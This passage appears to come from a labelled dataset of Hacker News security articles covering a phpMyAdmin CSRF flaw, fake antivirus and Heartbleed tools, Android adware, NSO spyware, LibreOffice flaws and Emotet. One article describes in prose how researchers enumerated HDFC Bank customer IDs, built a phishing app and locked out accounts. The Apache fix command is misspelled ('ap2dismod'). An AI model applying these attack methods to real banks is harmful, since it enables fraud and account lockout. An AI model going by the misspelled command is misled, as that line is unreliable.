trick authenticated users into executing an unwanted action. Identified as CVE-2019-12922, the flaw has been given a medium rating because of its limited scope that only allows an attacker to delete any server configured in the setup page of a phpMyAdmin panel on a victim's server. To be noted, it's not something you should not be much worried about because the attack doesn't allow attackers to delete any database or table stored on the server. All an attacker needs to do is send a crafted URL to targeted web administrators, who already have logged in to their phpmyAdmin panel on the same browser, tricking them into unknowingly delete the configured server by simply clicking on it. ""The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf of the user, in this way making possible a CSRF attack due to the wrong use of HTTP method,"" Cardenas explains in a post to the Full Disclosure mailing list. However, the vulnerability is trivial to exploit because other than knowing the URL of a targeted server, an attacker doesn't need to know any other information, like the name of the databases. Proof of Concept Exploit Code The flaw affects phpMyAdmin versions up to and including 4.9.0.1, which is the latest version of the software at the time of writing. The security flaw also resides in phpMyAdmin 5.0.0-alpha1, which was released in July 2019, Cardenas told The Hacker News. Cardenas discovered this vulnerability back in June 2019, and also responsibly reported it to the project maintainers. However, after phpMyAdmin maintainers failed to patch the vulnerability within 90 days of being notified, the researcher decided to release the vulnerability details and PoC to the public on 13 September. To address this vulnerability, Cardenas recommended to ""implement in each call the validation of the token variable, as already done in other phpMyAdmin requests,"" as a solution. Until the maintainers patch the vulnerability, website administrators and hosting providers are highly recommended to avoid clicking any suspicious links. ",Vulnerability "Beware of Fake-Antivirus ""Win 8 Security System""",https://thehackernews.com/2012/11/beware-of-fake-antivirus-win-8-security.html,"Late in August McAfee Labs discovered a Fake Antivirus program that claims to detect infections, and displays alerts to scare users into purchasing protection. On the contrary, this program is not genuine software and has nothing to do with reliable and effective AV tools. The truth is that this is another scam application developed to enter your PC through vulnerabilities in outdated programs. Trend Micro, which detects the threat as TROJ_FAKEAV.EHM said, ""After infecting a user's system, this malware scares its victim into buying the ""product"" by displaying fake security messages, stating that the computer is infected with spyware or other malware and only this product can remove it after you download the trial version. As soon as the victim downloads Win 8 Security System, it pretends to scan your computer and shows a grossly exaggerated amount of nonexistent threats"". This sort of malware is commonplace, with examples existing for Windows XP, Windows Vista, Windows 7 and even Mac OS X. What's amazing is not that the hackers have decided to use the Windows 8 name, but the fact that they chose to do this before Windows 8 is even out. Trend Micro's conclusion about this threat is that, It is typical for cybercriminals to piggyback on the highly-anticipated release of any latest technology to take their malware, spam, malicious app to new heights. To stay safe, users must keep their cool and think twice before clicking links or visiting web pages especially those that promise the latest items or programs for free. If it's too good to be true it probably is. ",Malware Default Apache Configuration Can Unmask Tor Hidden Services,https://thehackernews.com/2016/02/apache-tor-service-unmask.html,"Attention Tor Onion Hosters! A year old loophole in Apache Web Server, uncovered by an unknown Computer Science Student, could potentially unmask the real identity of .onion-domains and servers hidden behind the Tor-network. Although the loophole was reported on Reddit and to the Tor Project months back, it recently came to the limelight soon after a tweet by Alec Muffet, a well-known security enthusiast and current software engineer at Facebook. What is Tor Hidden (.onion) Service? Dark Web websites (generally known as 'onion services') with a special domain name that ends with .onion, are called Tor Hidden Service and reachable only via the Tor network. Tor Hidden Service is a widely popular anonymity network used by Whistleblowers, Underground Markets, Defense Networks and more in order to maintain secrecy over the Internet. An Onion Website can be hosted on the top of any web servers. But, if you are choosing Apache, then you need to rethink. Apache Misconfiguration Exposes Tor Hidden Servers According to the report, most distributions of Apache Server ship with mod_status module, enabled by default, which could disclose the real identity of the .onion domains, placing the Onion Servers at risk of being identified. Apache's mod_status module helps server administrators to monitor the health of web server with an HTML interface and is accessible via a web browser on its localhost only. The Output of this module would be available on every server when accessing the URL: https://website.com/server-status/ However, running mod_status module with Tor hidden service may result in exposing 'server-status' page to the world via Tor daemon service. This page would spit the sensitive backend data like server's settings, uptime, resource usage, total traffic, virtual hosts, and active HTTP requests if enabled by default which is enough to figure out the Server location. ""What could a malicious actor do in that case? They could spy on potentially sensitive requests,"" reads the blog post regarding the issue. ""They could deduce the server's approximate longitude if the timezone is set. They could even determine its IP address if a clearnet Virtual Host is present."" How to Disable mod_status on Apache Now, if you run a .onion domain on top of any Apache Server, then make sure that the mod_status is disabled. For this, you may need to run this code in shell command:- sudo ap2dismod status Where, ""ap2"" stands for Apache 2.x ""dis"" stands for disable ""mod"" stands for module Soon after this, if you reload, then you would be prompted by a 403 or 404 Error Prompt. The Error message would ensure that you are no longer vulnerable to that Risk. ",Vulnerability Google Kicks Out Largest Android Adware Family From The Play Store,https://thehackernews.com/2017/03/android-adware-malware-google.html,"With the rise in the mobile market, Adware has become one of the most prevalent mobile threats in the world. Adware has traditionally been used to aggressively push ads like banners or pop-ups on mobile screens to make money. The troublesome part is that Adware is now becoming trojanized and more sophisticated, as it aggressively collects personal data from the mobile device it's installed on, including name, birth date, location, serial number, contacts, and browser data without users' consent. However, the risk is a bit higher on Android than other platforms because of the extra permissions that apps enjoy. Although Google has stepped up its efforts to remove potentially harmful apps from its Play Store in the past years and added more stringent malware checks for new apps, Adware app eventually finds its way into its mobile app marketplace to target millions of Android users. In its recent efforts to make its Play Store ecosystem safe, Google has recently discovered a new massive ad-fraud family of a botnet that was infecting Android users through apps hosted on its official Play Store. Dubbed Chamois, the family of PHAs (potentially harmful applications) was capable of bombarding users with pop-up ads, boosting app promotion by automatically installing other applications in the background, subscribing users to premium services by sending text messages and downloading additional plugins without their knowledge. Google engineers said they caught Chamois after they discovered suspicious ad traffic while performing a routine ad traffic quality evaluation. Despite the fact that the app uses obfuscation and anti-analysis techniques to evade detection, Google engineers eventually uncovered a massive network of developers that had tricked users into installing malicious apps on their phones. The goal behind the malware-laced apps appears to have been ad fraud and make money by employing different techniques to bypass Google's detection and prevention systems. ""We analyzed malicious apps based on Chamois, and found that they employed several methods to avoid detection and tried to trick users into clicking ads by displaying deceptive graphics,"" security software engineers at Google said in a blog post. ""This sometimes resulted in downloading of other apps that commit SMS fraud. So we blocked the Chamois app family using Verify Apps and also kicked out bad actors who were trying to game our ad systems."" The Chamois apps had a multi-stage payload structure, including a custom encrypted storage area for configuration files and additional code, which required deeper analysis to understand the malicious part. According to the Google engineers, their security teams had to look through more than 100,000 lines of sophisticated code written by seemingly professional developers in an effort to figure out exactly what the Chamois-related apps were up to. After the discovery of Chamois, Google blocked the Chamois app family using its Verify Apps and also banned some people who were trying to take advantage of its ad system to make money on the adware apps. Google also updated its app testing system that is now capable of detecting this new Chamois-related threat. ",Malware New Facebook Bug Exposed 6.8 Million Users Photos to Third-Party Apps,https://thehackernews.com/2018/12/facebook-api-bug-leak.html,"Facebook's latest screw-up — a programming bug in Facebook website accidentally gave 1,500 third-party apps access to the unposted Facebook photos of as many as 6.8 million users. Facebook today quietly announced that it discovered a new API bug in its photo-sharing system that let 876 developers access users' private photos which they never shared on their timeline, including images uploaded to Marketplace or Facebook Stories. ""When someone gives permission for an app to access their photos on Facebook, we usually only grant the app access to photos people share on their timeline. In this case, the bug potentially gave developers access to other photos, such as those shared on Marketplace or Facebook Stories,"" Facebook said. What's worse? The bug even exposed photos that people uploaded to Facebook but chose not to post or didn't finish posting it for some reason. The flaw left users' private data exposed for 12 days, between September 13th and September 25th, until Facebook discovered and fixed the security blunder on the 25th September. ""Currently, we believe this may have affected up to 6.8 million users and up to 1,500 apps built by 876 developers. The only apps affected by this bug were ones that Facebook approved to access the photos API and that individuals had authorized to access their photos,"" Facebook said. The social media giant has started notifying impacted users of the flaw through an alert on their Facebook timeline that their photos may have been exposed, which will direct them to its Help Center page with more information. Facebook also says the social media network will soon be rolling out ""tools for app developers that will allow them to determine which people using their app might be impacted by this bug."" Facebook also assures its users that the company will be working with app developers to delete copies of photos that they were not supposed to access. 2018 has been quite a terrible year for Facebook with the social media giant found dealing with a slew of security incidents this year—the most significant one being the Cambridge Analytic scandal that exposed personal data of 87 million Facebook users. The social network also suffered its worst-ever security breach in September this year that exposed highly sensitive data of 14 million users. In the same month, Facebook also addressed a similar severe API bug that was actively being exploited by unknown hackers to steal secret access tokens and gather personal information for 30 million Facebook users. In June, Facebook also suffered another security issue affecting 14 million users, wherein users' posts that were meant to be private became public. These security incidents came out to be a failure of the social media giant in keeping the personal information of its 2.2 billion users protected while generating billions of dollars in revenue from the same information. ",Data_Breaches Israel Neutralizes Cyber Attack by Blowing Up A Building With Hackers,https://thehackernews.com/2019/05/israel-hamas-hacker-airstrikes.html,"The Israel Defense Force (IDF) claims to have neutralized an ""attempted"" cyber attack by launching airstrikes on a building in Gaza Strip from where it says the attack was originated. As shown in a video tweeted by IDF, the building in the Gaza Strip, which Israeli fighter drones have now destroyed, was reportedly the headquarters for Palestinian Hamas military intelligence, from where a cyber unit of hackers was allegedly trying to penetrate Israel's cyberspace. ""We thwarted an attempted Hamas cyber offensive against Israeli targets. Following our successful cyber defensive operation, we targeted a building where the Hamas cyber operatives work. HamasCyberHQ.exe has been removed,"" said the Israeli Defence Forces on Twitter. However, the Israel Defense Force has not shared any information about the attempted cyber attack by the Hamas group, saying it would reveal the country's cyber capabilities. According to Judah Ari Gross of Times of Israel, the commander of the IDF's Cyber Division said, ""We were a step ahead of them the whole time,"" and ""this was one of the first times where Israeli soldiers had to fend off a cyber attack while also fighting a physical battle."" However, it's not the first time when a country retaliates to a cyberattack with a physical attack. In 2015-16, the U.S. military reportedly killed two ISIS hackers—Siful Haque Sujan and Junaid Hussain of Team Poison hacking group—using drone strikes in Syria. The commander did not reveal the name of the target, but did say that the cyber attack by Hamas was aimed at ""harming the way of life of Israeli citizens."" The tension between Israel and Hamas has increased over the last year, with the latest conflict began on Friday after Hamas militants launched at least 600 rockets and mortars at Israel and shot two Israeli soldiers. In retaliation to the violence by Hamas, the Israel military has carried out their own strikes on what it claimed were hundreds of Hamas and Islamic Jihad targets in the coastal enclave. So far, at least 27 Palestinians and 4 Israeli civilians have been killed, and over 100 of them have been injured. The IDF said its airstrike targeted and killed Hamed Ahmed Abed Khudri, who the Israel military reportedly accused of funding the Hamas rocket fire attacks by transferring money from Iran to armed factions in Gaza. ""Transferring Iranian money to Hamas and the PIJ [Palestinian Islamic Jihad] doesn't make you a businessman. It makes you a terrorist,"" IDF wrote in a tweet that included an image of a Toyota car in flames. In a new development, Israel has stopped its air strikes on the Palestinian territory and lifted all protective restrictions imposed near the Gaza area, after Palestinian officials offered a conditional ceasefire agreement with Israel to end the violence. ",Cyber_Attack "U.S. Charges Three Chinese Hackers for Hacking Siemens, Trimble & Moody",https://thehackernews.com/2017/11/chinese-hackers-charged.html,"The United States Justice Department has charged three Chinese nationals for allegedly hacking Moody's Analytics economist, German electronics manufacturer Siemens, and GPS maker Trimble, and stealing gigabytes of sensitive data and trade secrets. According to an indictment unsealed Monday in federal court in Pittsburgh, Pennsylvania, the three men worked for a Chinese cybersecurity company, Guangzhou Bo Yu Information Technology Company Limited (Boyusec), previously linked to China's Ministry of State Security. Earlier this year, security researchers also linked Boyusec to one of the active Chinese government-sponsored espionage groups, called Advanced Persistent Threat 3 (or APT3), which is also known as Gothic Panda, UPS Team, Buckeye, and TG-0110. In 2013, APT3 allegedly stole the blueprints for ASIO's new Canberra building using a piece of malware that was uploaded to an ASIO employee's laptop. According to the indictment, the three Chinese nationals—identified as Wu Yingzhuo, Dong Hao, and Xia Lei—launched ""coordinated and unauthorized"" cyber attacks between 2011 and 2017, and successfully steal information from a number of organizations by compromising their accounts. The trio of hackers has alleged to have attacked Moody's Analytics, Siemens, and Trimble by sending spear-phishing emails with malicious attachments or links to malware. The men also used customized tools collectively known as the 'ups' or 'exeproxy' malware to gain unauthorized, persistent access to the targeted companies' networks, allowing them to search for and steal confidential business information and user credentials. ""The primary goal of the co-conspirators' unauthorized access to victim computers was to search for, identify, copy, package, and steal data from those computers, including confidential business and commercial information, work product, and sensitive victim employee information, such as usernames and passwords that could be used to extend unauthorized access within the victim systems,"" the DOJ said. The most affected one of the three companies was IT giant Siemens. According to the indictment, the defendants: Stole approximately 407 gigabytes of data from Siemens' energy, technology and transportation businesses in 2014. Hacked into Trimble's network and stole at least 275 megabytes of data, including trade secrets related to global navigation satellite systems technology the company spent millions of dollars developing, in 2015 and 2016. Accessed an internal email server at Moody's in 2011 and forwarded the account of an unidentified ""prominent employee"" to their own accounts, and eventually accessing the confidential messages sent to that account until 2014. According to the DoJ, both Wu and Dong were co-founders and shareholders of Boyusec, while Lei was an employee. All the three defendants were residents of Guangzhou. The Chinese men have been charged with a total of eight counts, including one charge of committing computer fraud and abuse, two charges of committing trade secret theft, three counts of wire fraud and four to eight counts of aggravated identity theft. If found guilty in the court of law, the hackers face a maximum sentence of 42 years in prison. ",Cyber_Attack Twitter Takes Tweetdeck Offline due to Vulnerability,https://thehackernews.com/2012/03/twitter-takes-tweetdeck-offline-due-to_31.html,"Twitter Takes Tweetdeck Offline due to Vulnerability Twitter has taken its Tweetdeck app offline after an apparent bug has possibly given some Tweetdeck users access to others' accounts. The web version of Tweetdeck is currently down, although older desktop editions of the software appear to continue to receive and send Tweets at the moment, and can still log out and back in. A Sydney, Australia-based Tweetdeck user named Geoff Evason says he discovered today he was somehow able to access hundreds of other accounts through Tweetdeck. ""I'm a tweetdeck user. A bug has given me access to hundreds of twitter and facebooks account through tweetdeck. I didn't do anything special to make this happen. I just logged in one day, the account was was slower than normal, and I could post from many more accounts."" And demonstrated that he could access another account by sending Tweet. Other accounts may well be affected, as Twitter quickly shut off access to Tweetdeck entirely to ""look into an issue. They've offered us no comment other than their Tweet. ",Vulnerability Facebook Sues Israeli NSO Spyware Firm For Hacking WhatsApp Users,https://thehackernews.com/2019/10/whatsapp-nso-group-malware.html,"Finally, for the very first time, an encrypted messaging service provider is taking legal action against a private entity that has carried out malicious attacks against its users. Facebook filed a lawsuit against Israeli mobile surveillance firm NSO Group on Tuesday, alleging that the company was actively involved in hacking users of its end-to-end encrypted WhatsApp messaging service. Earlier this year, it was discovered that WhatsApp had a critical vulnerability that attackers were found exploiting in the wild to remotely install Pegasus spyware on targeted Android and iOS devices. The flaw (CVE-2019-3568) successfully allowed attackers to silently install the spyware app on targeted phones by merely placing a WhatsApp video call with specially crafted requests, even when the call was not answered. Developed by NSO Group, Pegasus allows access to an incredible amount of data from victims' smartphones remotely, including their text messages, emails, WhatsApp chats, contact details, calls records, location, microphone, and camera. Pegasus is NSO's signature product that has previously been used against several human rights activists and journalists, from Mexico to the United Arab Emirates two years ago, and Amnesty International staffers in Saudi Arabia and another Saudi human rights defender based abroad earlier last year. Though NSO Group always claims it legally sells its spyware only to governments with no direct involvement, WhatsApp head Will Cathcart says the company has evidence of NSO Group's direct involvement in the recent attacks against WhatsApp users. NSO Group Violated WhatsApp's Terms of Service In a lawsuit filed (PDF) in U.S. District Court in San Francisco today, Facebook said NSO Group had violated WhatsApp's terms of services by using its servers to spread the spyware to approximately 1,400 mobile devices during an attack in April and May this year. The company also believes that the attack targeted ""at least 100 members of civil society, which is an unmistakable pattern of abuse,"" though it says this number may grow higher as more victims come forward. ""This attack was developed to access messages after they were decrypted on an infected device, abusing in-app vulnerabilities and the operating systems that power our mobile phones,"" Facebook-owned WhatsApp said in a blog post. ""Defendants (attackers) created WhatsApp accounts that they used and caused to be used to send malicious code to Target Devices in April and May 2019. The accounts were created using telephone numbers registered in different counties, including Cyprus, Israel, Brazil, Indonesia, Sweden, and the Netherlands."" The targeted users include attorneys, journalists, human rights activists, political dissidents, diplomats, and other senior foreign government officials, with WhatsApp numbers from different country codes, including the Kingdom of Bahrain, the United Arab Emirates, and Mexico. WhatsApp said the company sent a warning note to all the affected 1,400 users impacted by this attack, directly informing them about what happened. Facebook has also named NSO Group's parent company 'Q Cyber Technologies' as a second defendant in the case. ""The complaint alleges they violated both U.S. and California laws as well as the WhatsApp Terms of Service, which prohibits this type of abuse,"" the lawsuit states. Now, the company has sued NSO Group under the United States state and federal laws, including the Computer Fraud and Abuse Act, as well as the California Comprehensive Computer Data Access and Fraud Act. ",Cyber_Attack "Beware Of Fake 'HeartBleed Bug Remover Tool', Hijacks System with Malware",https://thehackernews.com/2014/05/beware-of-fake-heartbleed-bug-remover.html,"I am considering that you all must have read my last article on OpenSSL Heartbleed, a critical bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allows attackers to read portions of the affected server's memory, potentially revealing users data, that the server did not intend to reveal. The Heartbleed vulnerability made headlines around the world and my last article explains everything about probably the biggest Internet vulnerability in recent history, but still some readers are not aware of its nature, otherwise they would not have been a victim of the spam campaigns. Spammers are very smart on gaining from every opportunity they get, so this time they are taking advantage of the infamous Heartbleed bug and frighten the users into installing Anti-Heartbleed Software onto their systems, which is obviously a malware. The researchers at Symantec have unearthed a spam campaign targeting people by sending spam emails that warns them their system may still be ""infected"" with the Heartbleed bug and request them to run the Heartbleed bug removal tool (attached to the email, as shown below) in order to remove the virus from their system. The people with a little knowledge of the OpenSSL Heartbleed Bug may follow what the spammers say, despite websites around the world flooded with the Heartbleed articles, explaining how it works, how to protect, and exactly what it is. Yet many didn't get it right. We too explained almost everything related to the nature of the bug and the foremost myth of the people about the bug is answered in our top question that explained Heartbleed is not a Virus or Malware, instead it's a vulnerability resided in TLS heartbeat mechanism built into certain versions of the popular open source encryption standard OpenSSL. So, how could you go with the spammers in cleaning up your system to protect your systems from Heartbleed infection or malware? Now, this is something which is unacceptable and allows cybercriminals to targets users with less technical knowledge to know that the Heartbleed vulnerability is not at all an infection or a malware. ""The spam email uses the social and scare tactics to lure users into opening the attached file,"" reads the blog post. The email tricks users by masquerading itself to come from a very popular password management company, with the details to run the attached removal tool, along with the measures if users' antivirus software blocks it. Users feel safe to open the attachment as the attached file seems to be a docx file, but once it is opened, it will serve an encrypted zip file to the user. When the user extracts the zip file content, they will find a malicious .exe file that represents itself as the Heartbleed bug removal tool. Once the .exe file is executed by the user, it downloads a keylogger in the background without their knowledge, whereas the user shows a popup on the screen with a progress bar. After a while, a message flash on the screen reporting users that Heartbleed bug was not found and the computer is clean. The user may feel relieved after knowing that the Heartbleed bug has not affected them, but during the same time they are unaware of the key-logger software installed in background and recording keystrokes, screenshots and sending all the personal information of users to the cyber criminals. Users are recommended not to click on any link in the suspicious messages and better use your common sense and knowledge at right time and right place, because security researchers, experts and we sitting here can only provide you knowledge about the various vulnerabilities and measures to get rid of it, but else is up to you to protect yourself from these kind of security threats. ",Malware HDFC Bank website vulnerable to ID Theft and Account Blockade,https://thehackernews.com/2013/03/hdfc-bank-website-vulnerable-to-id.html,"Indian Security Researcher Jiten Jain from Xebia Architects today revealed that one of the Largest Private Banks in India, HDFC Bank's e-Banking website could be easy target of Unique type of Denial of Service Attack which could result in blocking of e-banking accounts of all its customers. Here is the detailed report of vulnerability submitted by him. ___________________________________________ The NetBanking service of HDFC Bank, Which is one of the largest and most reputed Banks in India, is completely vulnerable to ID theft, Targeted phishing and Mass Account Blockade. HDFC bank has implemented an extra security solution called 'Secure Access' on its website but instead it has given a hidden door to hackers to block all HDFC NetBanking accounts. 'Secure Access' is an additional layer of security implement on HDFC Bank website is essentially a solution protecting your account from hackers and fraudsters. Secure Access, an online security initiative is intended to make NetBanking transactions safer by protecting users from phishing websites and Hackers and help users authenticate original HDFC website. HDFC Bank's NetBanking login is now a two-step process with Secure Access image and text verification. Let us take you through the steps involved in Secure Access and how it intends to protect NetBanking account of HDFC customers. Let us take you through the steps involved in Secure Access and how it intends to protect NetBanking account of HDFC customers. 1) In First Step User has to provide his customer-id (User Id) on the first screen 2) User is then taken to the next screen where he is shown his personalized picture and message and asked to enter his IPIN (password). Demo presentation of secure access work can be seen on HDFC website at following URL https://www.hdfcbank.com/assets/demo/secure_access.swf Secure Access which is claimed to be Multi-layered Authentication Process mandatory requires HDFC NetBanking users to register for it if they want to conduct ANY Third Party Transactions like Transferring Money, booking movie tickers, recharging phone. During the research on HDFC Mobile Banking application and NetBanking Portal it was discovered that while implementing Secure Access HDFC Bank has compromised on the first and foremost principle of user authentication on any Banking website i.e. Never reveal whether its User Name or the password which is incorrect in case wrong combination is entered. Since Secure access implementation requires user to only enter his Customer ID (The fixed user name in case of HDFC bank NetBanking users. The system then checks at the backend if the user is registered for Secure Access or NetBanking, if user is not a registered or valid user, Customer id is asked again. But in case if the customer id is found to be correct and registered, User is taken to second step and shown his secure access image and text he selected and asked to enter is password. 1.) 1 Now this 1st step of verifying customer id and showing personalized secure access image and text has made HDFC Bank vulnerable to Blind customer id collection. We exploited this vulnerability by running an automated suite with by generating random customer ids in a sequence (example from 434XXXX to 515XXXXXX) and logged on HDFC NetBanking website using them. The customer ids which showed secure access and image and text were noted and rest was discarded. The secure Access images and text which was shown for valid customer ids were also saved. Now by the process above we were able to achieve 3 things. It was shocking to see that secure text was displayed as simple text and not a text image. By this automated first step of Login, we were able to create a Database of several customer Ids of HDFC NetBanking users. We could have made a complete database of every NetBanking users but since this trial was conducted with a motive of checking security on banking site, only a sample data was collected. We decided to destroy this data later after completing this Demonstration. HDFC Phishing Mobile App using our database of secure Access images and Text Customer Id, Personalized Image and Text of Customer in above Screenshots has been hidden for security 2) We then setup a phishing portal for HDFC Net banking and created a fake HDFC NetBanking Mobile app and tried it on some people. In our fake HDFC mobile application and phishing portal we were able to replicate exactly same Secure Access behavior like on original HDFC website using the database of Customer IDs of NetBanking users and their secure Access image and text we had created earlier. Since our site was showing the same secure Access images and text on entering customer ids we used their security feature to provide more authentic look to our phishing website and Mobile application. The Situation was worse for fake mobile app since Mobile users could not even see the URL, setting aside any chance of doubt in mind of user. Several users trusted our phishing site and mobile app and tried to log in with their passwords. 3) Now in a third Killing step we launched denial of service attack on website the by blocking some user accounts. Since Secure Access authentication vulnerability has helped us create the database of customer ids of HDFC NetBanking users we launched another program which simple went on HDFC NetBanking website and provided customer id from our database on HDFC NetBanking login page. As we were providing valid Customer Id's, when asked for IPIN/Password we entered it incorrectly 5 times which resulted in those customers being blocked from NetBanking. We used chain proxy to bypass time and Sequence checks but were surprised to find out that HDFC site had NONE and we were able to easily block several user accounts. Since we were guided by ideology of ethical hacking we conducted above research on a sample data But This flaw in authentication can be easily used by anyone to generate a Database of Customer Ids of HDFC NetBanking Users and completely Block all NetBanking accounts of all HDFC NetBanking users. The same may be the used by the miscreants or competitors of HDFC bank to hold literally entire NetBanking service of HDFC bank for ransom by repeatedly blocking accounts even if they are enabled again. This vulnerability also raises a big question, Are We forgetting basic principles of Security in race of trying security solution? x--x--x While Speaking to ""The Hacker News"" ,Mr. Jiten disclosed that had shared the above vulnerability report with the HDFC Bank in February itself to provide them ample time to fix the above vulnerability. The report about lacking security on HDFC online banking website is another blow to HDFC Bank which is already facing flak for its shady deals and is currently under a Black Money investigation by Indian Government. ",Vulnerability 'Pinkie Pie' discovered second Chrome exploit worth $60k at Pwnium 2,https://thehackernews.com/2012/10/pinkie-pie-discovered-second-chrome.html,"Hacker known as ""Pinkie Pie"" produced the first Chrome vulnerability at the Hack In the Box conference on Wednesday, just ahead of the deadline for the competition this afternoon. The exploit, if later confirmed by Google's US headquarters, will have earned the teenage hacker known as Pinkie Pie the top US$60,000 cash reward. In March, Pinkie Pie and Sergey Glazunov both won $60,000 for their exploits at the first Pwnium competition. Google established the Pwnium competition as an alternative to the Pwn2own contest in order to add the requirement that participants provide details of their exploit. Google will give away up to a total of US$2 million during the event. $60,000 - ""Full Chrome exploit"": Chrome / Win7 local OS user account persistence using only bugs in Chrome itself. $40,000 - ""Partial Chrome exploit"": Chrome / Win7 local OS user account persistence using at least one bug in Chrome itself, plus other bugs. For example, a WebKit bug combined with a Windows sandbox bug. $20,000 - ""Consolation reward, Flash / Windows / other"": Chrome / Win7 local OS user account persistence that does not use bugs in Chrome. For example, bugs in one or more of Flash, Windows or a driver. These exploits are not specific to Chrome and will be a threat to users of any web browser. ",Vulnerability "Idea Cellular Web Portal Hacked, Customers Info may be exposed !",https://thehackernews.com/2011/08/idea-cellular-web-portal-hacked.html,"Idea Cellular Web Portal Hacked, Customers Info may be exposed ! Again a critical SQL Injection Vulnerability has been discovered by zSecure Team in a high profile web portal. This time it's Ideacellular web portal which compromises the entire site database. Any malicious smart black hats can create much more devastating attacks using this critical flaw such as: complete access to various database's as shown in screen-shots under proof of vulnerability which can later be misused to access various confidential information; complete database dump; possibility of uploading shell (not fully certain) and much more. Target Website: https://www.ideacellular.com Attack Type: Hidden SQL Injection Vulnerability Database Type: MySql 5.0.27 Alert Level: Critical Threats: Database Access, Database Dump Credit: zSecure Team Previous Vulnerability Discolsures: Dukascopy, Sify, TimesofMoney, Sharekhan Proof of Vulnerability: About the Company Idea is the 3rd largest mobile services operator in India. Idea's strong growth in the Indian telephony market comes from its deep penetration in the non-urban and rural markets. IDEA Cellular is an Aditya Birla Group Company, India's first truly multinational corporation. The group operates in 26 countries, and is anchored by over 130,600 employees belonging to 40 nationalities. The Group has been adjudged the '6th Top Company for Leaders in Asia Pacific Region' in 2009, in a survey conducted by Hewitt Associates, in partnership with The RBL Group, and Fortune. The Group has also been rated 'The Best Employer in India and among the Top 20 in Asia' by the Hewitt-Economic Times and Wall Street Journal Study 2007. Disclaimer No data has been dumped; zSecure Team randomly tried the security of ideacellular web portal and in our very first attempt they discovered this critical flaw. Since this flaw was discovered in their very first attempt, existence of other flaws can't be denied. Database has been accessed just to take screenshots so that they can make company believe that the aforesaid flaw actually because most of the companies use to treat the like advisories/disclosure as junk and don't believe the researcher's which may later cause them huge. As well said zSecure Team respect the confidentiality of Ideacelluar that's why they restricted the contents of their screen-shots to database tables only. W e hope that company Ideacellular will take some immediate steps to fix-up this critical vulnerability asap. Source ",Vulnerability Another Malware from Android Market infect Millions of Users,https://thehackernews.com/2012/01/another-malware-from-android-market.html,"Another Malware from Android Market infect Millions of Users Malware might have infected more than 5 million Android mobile devices via deliberately corrupted apps sold in the Android Marketplace, according to security firm Symantec. They reckoned Android.Counterclank, a slight variant of Android.Tonclank. Symantec explains that the malicious code appears in a package called ""apperhand"", and a service under the same name can been seen running on the infected device when it's executed. According to Symantec, the Trojan has been identified in 13 different apps in the Android Marketplace. Symantec's Security Response Team Director, Kevin Haley said:""They don't appear to be real publishers. There aren't rebundled apps, as we've seen so many times before."" Symantec also noted that this slimy piece of malware has the highest distribution of any malware identified so far this year and may actually be the largest malware infection seen by Android users in the operating systems short life. The malware is actually a Trojan that attacks Android smartphones. Upon installation, it collects a wide scope of data, including the handset maker and bookmark copies. Moreover, it modifies the home page of the browser. As a result, hackers have earned some money from the malware by pushing some unwanted advertisements on the compromised Android devices.One of the reasons why the malware has affected such a huge number of Android users is because they do not bother reading privacy agreements. They simply approve these apps, without even reading information on them. Symantec stated it had notified Google of the apps hiding malicious code. However, many of the infected entries were still available on the Android Market as of Friday afternoon. For removal of the malware, Symantec is advising smartphone users to uninstall the infected applications and run a mobile antivirus program. It's time Google started taking security much more seriously. ",Malware Patches for 2 Severe LibreOffice Flaws Bypassed — Update to Patch Again,https://thehackernews.com/2019/08/libreoffice-patch-update.html,"If you are using LibreOffice, you need to update it once again. LibreOffice has released the latest version 6.2.6/6.3.0 of its open-source office software to address three new vulnerabilities that could allow attackers to bypass patches for two previously addressed vulnerabilities. LibreOffice is one of the most popular and open source alternatives to Microsoft Office suite and is available for Windows, Linux and macOS systems. One of the two vulnerabilities, tracked as CVE-2019-9848, that LibreOffice attempted to patch just last month was a code execution flaw that affected LibreLogo, a programmable turtle vector graphics script that ships by default with LibreOffice. This flaw allows an attacker to craft a malicious document that can silently execute arbitrary python commands without displaying any warning to a targeted user. Apparently, the patch for this vulnerability was insufficient, as The Hacker News also reported late last month, which allowed two separate security researchers to bypass the patch and re-enable the attack by exploiting two new vulnerabilities, as explained below: CVE-2019-9850: Discovered by Alex Inführ, the vulnerability in LibreOffice exists due to insufficient URL validation that allows malicious attackers to bypass the protection added to patch CVE-2019-9848 and again trigger calling LibreLogo from script event handlers. CVE-2019-9851: Discovered by Gabriel Masei, this flaw resides in a separate feature where documents can specify pre-installed scripts, just like LibreLogo, which can be executed on various global script events such as document-open, etc. The patch for the second vulnerability (CVE-2018-16858) that LibreOffice released in February has successfully been bypassed, re-enabling the directory traversal attack that could allow malicious documents to execute any script from arbitrary locations on the victim's file system. CVE-2019-9852: Discovered by Nils Emmerich of ERNW Research GmbH, a URL encoding attack could allow attackers to bypass patch for directory traversal attack. By successfully exploiting all these three vulnerabilities, a remote attacker can silently execute malicious commands on a targeted computer by convincing the victim into just opening a maliciously-crafted document file. LibreOffice users are highly recommended to update their office software to the latest patched version 6.2.6/6.3.0 as soon as possible in order to avoid becoming victims to any attack exploiting these vulnerabilities. ",Vulnerability Emotet Malware Destroys Itself From All Infected Computers,https://thehackernews.com/2021/04/emotet-malware-destroys-itself-today.html,"Emotet, the notorious email-based Windows malware behind several botnet-driven spam campaigns and ransomware attacks, was automatically wiped from infected computers en masse following a European law enforcement operation. The development comes three months after a coordinated disruption of Emotet as part of ""Operation Ladybird"" to seize control of servers used to run and maintain the malware network. The orchestrated effort saw at least 700 servers associated with the botnet's infrastructure neutered from the inside, thus preventing further exploitation. Law enforcement authorities from the Netherlands, Germany, the U.S., U.K., France, Lithuania, Canada, and Ukraine were involved in the international action. Previously, the Dutch police, which seized two central servers located in the country, said it had deployed a software update to counter the threat posed by Emotet effectively. ""All infected computer systems will automatically retrieve the update there, after which the Emotet infection will be quarantined,"" the agency noted back in January. This involved pushing a 32-bit payload named ""EmotetLoader.dll"" via the same channels that were used to distribute the original Emotet to all compromised machines. The cleanup routine, which was set to trigger itself automatically on April 25, 2021, worked by removing the malware from the device, in addition to deleting the autorun Registry key and terminating the process. Now on Sunday, cybersecurity firm Malwarebytes confirmed that its Emotet-infected machine that had received the specially-crafted time bomb code had successfully initiated the uninstallation routine and removed itself from the Windows system. As of writing, Abuse.ch's Feodo Tracker shows none of the Emotet servers are online. However, it remains to be seen if this ""final"" blow to the botnet will cause it to bounce back in the future or render it permanently inoperable, paving the way for other cybercrime actors to fill the void. ""Historically, Emotet's operators used long breaks in activity to improve 